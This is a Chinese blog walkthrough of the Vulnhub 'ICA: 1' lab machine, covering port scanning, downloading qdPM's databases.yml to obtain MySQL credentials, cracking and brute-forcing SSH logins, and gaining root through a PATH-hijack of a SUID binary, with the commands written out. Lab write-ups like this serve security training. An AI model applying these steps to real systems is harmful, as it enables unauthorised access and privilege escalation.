Vulnhub 靶场 ICA: 1

Vulnhub 靶场 ICA: 1

前期准备

下载链接:https://www.vulnhub.com/entry/ica-1,748/
kali攻击机:192.168.147.178
靶机:192.168.147.189

一、信息收集

1、nmap扫描服务器。
image
发现开放了22、80、3306端口。
2、收集80端口信息。
image
上述信息告诉我们使用的是 qdPM 9.2 系统,查看有没有相关漏洞。
image
存在一个数据库泄露泄露信息漏洞,。

二、漏洞攻击

1、查看如何使用(获取数据库用户名密码)。
image
下载 http://192.168.147.189/core/config/databases.yml 文件。并cat文件,得到用户名密码。
image
用户名、密码:qdpmadmin:UcVQCMQk2STVeS6J
2、远程登录mysql,进行查库、表、用户等相关信息的查询。
image
得到账号和密码。将密码用base64解码保存到pass.txt。(账号大小写都要)
把用户名保存在 user.txt 文件中,爆破一下ssh(80端口页面是邮箱和密码,不符合):
image
发现两组账号和密码:
login: travis password: DJceVy98W28Y7wLg
login: dexter password: 7ZwV4qtg42cmUXGX
3、登录ssh
登陆一下 travis 用户:
image
得到第一个flag,查看权限,发现密码不对,切换成dexter 用户:
image
查看note.txt文件
image

It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.

在我看来,访问系统时存在弱点。
据我所知,可执行文件的内容是部分可见的。
我需要找出是否存在漏洞。

三、提权

find / -perm -u=s 2>/dev/null    #查看一下有权限的文件

image
发现有个 get_access 文件比较可疑,string查看后下载到本地查看一下:
image
查看文件
image
发现会以root权限查看文件,那我们可以通过伪造一个文件名为cat的可执行文件,文件内容为/bin/bash,并将文件路径设置为环境变量,这样执行get_access的时候,就会执行我们伪造的cat文件,从而使我们获得root权限:

1、echo '/bin/bash' > /tmp/cat
2、chmod +x /tmp/cat
3、echo $PATH
4、export PATH=/tmp:$PATH
5、/opt/get_access

image
得到root权限。

posted on   水果味儿  阅读(114)  评论(0编辑  收藏  举报

相关博文:
阅读排行:
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

统计

点击右上角即可分享
微信分享提示